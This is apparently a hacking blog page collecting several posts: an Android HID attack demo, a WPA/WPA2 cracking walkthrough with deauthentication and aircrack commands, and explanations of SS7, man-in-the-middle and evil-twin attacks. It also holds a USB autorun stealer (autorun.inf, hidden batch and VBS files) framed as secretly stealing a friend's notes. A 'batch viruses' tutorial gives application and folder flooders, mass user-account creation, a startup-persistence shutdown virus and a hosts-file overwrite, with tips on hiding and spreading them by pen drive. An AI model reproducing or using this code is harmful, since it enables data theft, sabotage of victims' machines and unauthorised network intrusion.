Tuesday, May 11, 2021

Use phone As Rubber Ducky Against Another phone

 

Use phone As Rubber Ducky Against Another phone

Posted by VIVEK SHUKLA

Use Android as Rubber Ducky against another Android device

HID attack using Android
Using Android as Rubber Ducky against Android. This is not a new technique, just a demo how to perform HID attack using Android instead of rubber ducky. For targeted Android device it is not necessary to be rooted, have ADB/USB debugging enabled and device authorized, since attacker’s smartphone behaves as connected keyboard.

How to prevent this happening

  1. charge you smartphone using your own adapter
  2. use none trivial PIN or password lockscreen protection
  3. use mobile security software that will detect and prevent from launching payloads



Prerequisites

  • rooted Android with HID kernel support (e.g. NetHunter ROM)
  • OTG cable

Script info
This is custom script, which might not work on your testing case scenario. Because of that, you must play around with pressed keys that are sent to targeted device. Website with my testing payload is not active anymore. List of all possible keys can be found on the link below.

Execute command
bash hid_attack

How to flash custom ROM with HID support
https://github.com/pelya/android-keyboard-gadget

Brute-force pin using Android as HID
https://github.com/urbanadventurer/Android-PIN-Bruteforce

List of all keys
https://github.com/anbud/DroidDucky/blob/master/droidducky.sh

Feel free to leave a comment below or reach me on Instagram @i_amsilentknight__.


Thursday, May 6, 2021

How to Hack WPA/WPA2 WiFi Using Kali Linux?

 “Hacking Wifi” sounds really cool and interesting. But actually hacking wifi practically is much easier with a good wordlist. But this world list is of no use until we don’t have any idea of how to actually use that word list in order to crack a hash. And before cracking the hash we actually need to generate it. So, below are those steps along with some good wordlists to crack a WPA/WPA2 wifi.

Note: Use the below methods only for educational/testing purposes on your own wifi or with the permission of the owner. Don’t use this for malicious purposes.

So, boot up Kali Linux. Open the terminal window. And perform the following steps.

Step 1: ifconfig(interface configuration) : To view or change the configuration of the network interfaces on your system.

ifconfig

ifconfig-linux-interface-configuration



Here,

  • eth0 : First Ethernet interface
  • l0 : Loopback interface
  • wlan0 : First wireless network interface on the system. (This is what we need.)

Step 2: Stop the current processes which are using the WiFi interface.

airmon-ng check kill

stop-process-which-are-using-wifi-linux

Step 3: To start the wlan0 in monitor mode.

airmon-ng start wlan0

start-interface-linux

Step 4: To view all the Wifi networks around you.

airodump-ng wlan0mon

view-all-wifi-networks

Here,



  • airodump-ng : For packet capturing
  • wlan0mon : Name of the interface (This name can be different on the different devices)

Press Ctrl+C to stop the process when you have found the target network.

Step 5: To view the clients connected to the target network.

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon

view-connected-clients-to-target

Here,

  • airodump-ng : For packet capturing
  • -c : Channel
  • –bssid : MAC address of a wireless access point(WAP).
  • -w : The Directory where you want to save the file(Password File).
  • wlan0mon : Name of the interface.

Step 6: Open a new terminal window to disconnect the clients connected to the target network.

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

disconnect-clients-connected-to-target

  • aireplay-ng : To inject frames
  • -0 : For deauthentication
  • 10 : No. of deauthentication packets to be sent
  • -a : For the bssid of the target network
  • wlan0mon : Name of the interface.

When the client is disconnected from the target network. He tries to reconnect to the network and when he does you will get something called WPA handshake in the previous window of the terminal.

capturing-WPA-handshake

Now, we are done with capturing the packets. So, now you can close the terminal window.

Step 7. To decrypt the password. Open the Files application.

to-decrypt-password-from-handshake

Here,

  • hacking-01.cap is the file you need.
    aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
  • aircrack-ng : 802.11 WEP and WPA-PSK keys cracking program
  • -a : -a2 for WPA2 & -a for WPA network
  • -b : The BSSID of the target network
  • -w : Location of the wordlist file
  • /root/hacking-01.cap : Location of the cap file

You can download the file of common passwords from the internet and if you want to create your own file then you can use the crunch tool
wifi-password-cracked

What is SS7?

 Introduced and adopted in the mid 70s, SS7 (Common Channel Signaling System No. 7 or C7) has been the industry standard since, and hasn’t advanced much in decades. It’s outdated security concepts make it especially vulnerable to hackers.

SS7’s success has also, in a way, been its curse. At least when it comes to cyber security. The SS7 protocol is used everywhere, and is the leading protocol for connecting network communication worldwide. Because it is so prevalent, used by both intelligence agencies and mobile operators. From a surveillance perspective, it is considerably effective. As such, SS7 is an attacker’s best friend, enabling them access to the same surveillance capabilities held by law enforcement and intelligence agencies.

How does SS7 work?

The set of SS7 telephony signaling protocols is responsible for setting up and terminating telephone calls over a digital signaling network to enable wireless cellular and wired connectivity. It is used to initiate most of the world’s public telephone calls over PSTN (Public Switched Telephone Network).

call setup example

Over time other applications were integrated into SS7. This allowed for the introduction of new services like SMS, number translation, prepaid billing, call waiting/forwarding, conference calling, local number portability, and other mass-market services.

Components and elements that make up the SS7 Protocol Stack –

ss7 protocol setup

What are SS7 attacks?

SS7 attacks are mobile cyber attacks that exploit security vulnerabilities in the SS7 protocol to compromise and intercept voice and SMS communications on a cellular network. Similar to a Man In the Middle attack, SS7 attacks target mobile phone communications rather than wifi transmissions.

How do SS7 attacks work?

SS7 attacks exploit the authentication capability of communication protocols running atop the SS7 protocol to eavesdrop on voice and text communicationsAccording to telecommunications experts, all a cyber criminal would need to successfully launch an SS7 attack are a computer running Linux and the SS7 SDK – both free to download from the Internet.

Once connected to an SS7 network, the hacker can target subscribers on the network while fooling the network into thinking the hacker device is actually an MSC/VLR node.

sms interception stage 1

sms interception step 2

What’s in it for the Hackers?

When a hacker successfully performs a MitM phishing attack, they gain access to the same amounts and types of information that are usually reserved for the use of security services. Having the ability to eavesdrop on calls and text messages, as well as device locations empowers hackers to gain valuable information.

A common security precaution used by many is one of the targets of SS7 attacks. Two-factor authentication (also known as 2FA) via SMS using SS7 is inherently flawed as these SMS messages are unencrypted and hackers know how to intercept them. With the code from the SMS in their hand, a cyber-criminal can potentially reset your password to Google, Facebook, WhatsApp account, or even your bank account.

The Risks to Digital Businesses

It doesn’t take an expert to see that it takes little skill and equipment for a hacker to successfully mount a  man-in-the-middle MitM phishing attack. With most businesses managing their communications over cellular connections, it’s clear that SS7 attacks pose a significant risk. It’s important to remember that isn’t not only proprietary or confidential information hackers are interested in. The growing prevalence of IoT devices relyant on mobile networks to transmit data is expanding the risk playing field.  

An enterprise’s IoT infrastructure, critical services can be prime targets. Such attacks can lead to potentially damaging breaches of confidential information as well as hijacking or disabling of mission-critical devices and services

Considering how high the risks are, manufacturers are doing too little to warn businesses using IoT devices about potential security vulnerabilities in their products. This exposes network operators to attacks through compromised customer IoT devices on their network.

What can mobile operators do to prevent SS7 attacks?

The flaws and vulnerabilities inherent in the SS7 protocol are out of the jurisdiction of enterprises, small businesses as well as consumers. Being that, SS7 vulnerabilities cannot simply be removed or fixed. 

The GSMA recommends that mobile network operations focus on consumer education. With consumers paying more attention to the security of their smartphones and IoT devices they are more likely to take action to secure their devices. Especially when it comes to critical applications and services like Smart Homes and Offices.

1. User Password Security

Two factor SMS authentication, flawed as it is, is still widely used. Security conscious businesses and services are gradually moving away from SMS and offer other methods of authenticating users which do not rely on antiquated telephone protocols like SS7

2. Monitoring & Event Analysis

If an SS7 network is successfully compromised, companies need to have the ability to monitor the activity during the attack. They need to be informed on security events in the context of what is happening on corporate servers as well as devices. This needs to be part of any enterprise mobile security strategy. Ultimately, businesses need to implement a defense that identifies threats and takes action before any damage occurs.

3. Regular Updates

Cyber security is not a set it and forget it deal even if you employ automation. Cybercriminals are always coming up with new exploits and approaches to compromise systems to get their hands on confidential data or hijack devices for ransom. Effective Patch Management is critical and complements adaptive defense. By employing real time analysis of endpoint security, business can ensure known vulnerabilities are sealed as soon as possible through software and firmware updates.

What can YOU do? 

The only way to be fully safe from SS7 attacks is to simply shut your smartphone off. You and I both know that’s not an option. So what you can do is “know the enemy”. Being aware that malicious activities like SS7 attacks are prevalent and common is simply a necessity in 2020.

That said, with the billions of mobile phone users worldwide, the risk of you being targeted for surveillance by cyber-criminals is probably small. But if you happen to be a president, queen or even doctor holding sensitive patient information on their mobile, your chances are much higher than those of an average Joe. If you’re still using 2FA for banking services, you might very well be in danger of having your account compromised.

Considering just how easy it is to execute an SS7 attack and how much damage a successful one can do to both the victim and their service provider, one can only hope that innovation in telecom will protect us, the end users. For enterprises, government agencies and MSPs today there are numerous solutions ranging from complex customized mobile VPN systems, to innovative plug-and-play solutions like FirstPoint SIM-based user level protection

Man-in-the-Middle Attack

A Man-in-the-Middle Attack (MITM) is a form of cyber eavesdropping in which malicious actors insert themselves into a conversation between two parties and intercept data through a compromised but trusted system. The targets are often intellectual property or fiduciary information. MITM aggressors will also use malware to open the communications channel with the hopes of creating zombie machines or building vast networks of comprised systems. Man-in-the-Middle Attacks can be used as way into systems in order to execute an advanced persistent threat (APT).

In many cases organizations are unaware their session and/or data has been tampered with until it is much too late. If a MITM attack is successful, organizations experience negative brand perception, reduced customers’ confidence and ultimately a damaged bottom line. 

Understanding Evil Twin AP Attacks and How to Prevent Them

 The attack surface remains largely unprotected from Wi-Fi threats that can result in stolen credentials and sensitive information as well as backdoor/malware payload drops.

It's been nearly 20 years since IEEE 802.11b was released and the world got the first Wi-Fi-branded products. And yet the Layer 2 attack surface remains largely unprotected from dangerous Wi-Fi threats that can result in stolen credentials and sensitive information as well as backdoor/malware payload drops. Attackers have been exploiting a fundamental issue with Wi-Fi: Laptops, smartphones, and connected devices aren't equipped to distinguish between two radios broadcasting the same SSID name. This allows hackers to use malicious access points (APs) that eavesdrop on traffic, establish "man-in-the-middle" (MitM) positions, and extract sensitive information, often without leaving any traces behind.  

One of the most dangerous Wi-Fi threat categories is undoubtedly "evil twin" APs, an attack technique nearly two decades old. In fact, the US Department of Justice recently charged hackers within the Russian military agency GRU with implementing evil twin AP attacks to steal credentials and "plant espionage-oriented malware" targeting organizations such as anti-doping agencies, nuclear power operations, and chemical testing laboratories.

How did these GRU attacks work? The threat actor used 802.11 radios to broadcast the same SSIDs as offices and hotels in order to trick victims' devices into associating, thereby establishing their MitM position and supplying Internet service through 4G LTE connections to evade network security. Let's take a closer look at evil twin attacks to better understand defense best practices and techniques.

Analyzing Evil Twin AP Attacks
In a normal Wi-Fi connection, a person's client device (image below) associates with a legitimate AP. 

Source: Ryan Orsi, WatchGuard
Source: Ryan Orsi, WatchGuard



When an evil twin AP is present, a threat actor broadcasts the same SSID as the legitimate AP (and often the same BSSID or MAC address of the SSID) to fool the device into connecting (image below).

Source: Ryan Orsi, WatchGuard

In the case of the GRU evil twin attacks, hackers reportedly used a popular pen-testing tool — the Wi-Fi Pineapple from Hak5 — connected to high-gain antennas, battery packs, and a mobile 4G LTE WAN backhaul connection located in the trunks of their cars or carried within backpacks into buildings. The Wi-Fi Pineapple automates much of the labor required to set up an evil twin attack.

While within range of the target SSID, attackers begin by broadcasting the same SSID. This is straightforward and can even be done on smartphones with data plans that allow mobile Wi-Fi hotspot tethering. Attackers looking to avoid drawing suspicion toward antennas and battery packs typically opt for a popular tool called bettercap, which can run natively on Linux, Mac, Windows, and Android systems.

The bettercap command used to configure a fake SSID to be broadcasted natively from a laptop or other client is "wifi.ap.ssid."

Thursday, September 10, 2020

Steel someone's secret file through usb flash drive

 Steel Someone Secret File Using USB Flash Drive.

maxresdefault

Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.

To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.

Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.

STEP 1

Open Notepad (I recommend Notepad++) and copy-paste the following lines.
(Code-
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat)

Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.

STEP 2

Open Notepad again and copy-paste the following lines
(code-
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls)

Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.

STEP 3

Open Notepad once again and copy-paste the following line.
(code:
CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False)

Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
STEP 4

Open Notepad one last time and copy-paste the following line.
(code
wscript.exe \invisible.vbs file.bat)

Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.batso file.bat is run with code from vbs file.
STEP 5

Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly

Wednesday, September 9, 2020

Batch files

Batch Files – the art of creating viruses

I could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, I have focussed on making the basics of batch files clear and developing the approach to code your own viruses.

What are Batch Files ?

Lets begin with a simple example , Open your command prompt and change your current directory to ‘desktop’ by typing ‘cd desktop’ without quotes.
Now type these commands one by one

1. md x //makes directory ‘x’ on desktop
2. cd x // changes current directory to ‘x’
3. md y // makes a directory ‘y’ in directory ‘x’

We first make a folder/directory ‘x’, then enter in folder ‘x’,then make a folder ‘y’ in folder ‘x’ .
Now delete the folder ‘x’.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat

Now just double click on this batch file and the same work would be done , You will get a folder ‘x’ on your desktop and folder ‘y’ in it. This means the three commands executed line by line when we ran the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as ‘all files’ instead of text files).

Note: Type ‘help’ in command prompt to know about some basic commands and to know about using a particular command , type ‘command_name /?’ without quotes.

1. Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.

2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x

Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.

3.User account flooder

@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers.

4.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

5. DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.

@echo off
echo xxx.xxx.xxx.xxx http://www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxxhttp://www.anything.com in hosts file.

Replace xxx.xxx.xxx.xxxand http://www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

Viruses we just coded

Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.
Download this Batch To Exe coverter from here.

After running converter , open the batch file virus , Save as exe file , set visibility mode ‘Invisible application’ , than just click on compile button.

You can use other options as per your requirement.

Spreading batch viruses through pen drive -:

Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

have FunNN

Advertisements

REPORT THIS AD

Use phone As Rubber Ducky Against Another phone

  April 28, 2021 Android Tricks  /  Linux Use phone As Rubber Ducky Against Another phone Posted by VIVEK SHUKLA Use Android as Rubber Ducky...

Spyzone Form

Get Featured Updates, fill out the form now :
https://forms.gle/WLyXPLhp4ao7kqJP9

Contact Us

Name

Email *

Message *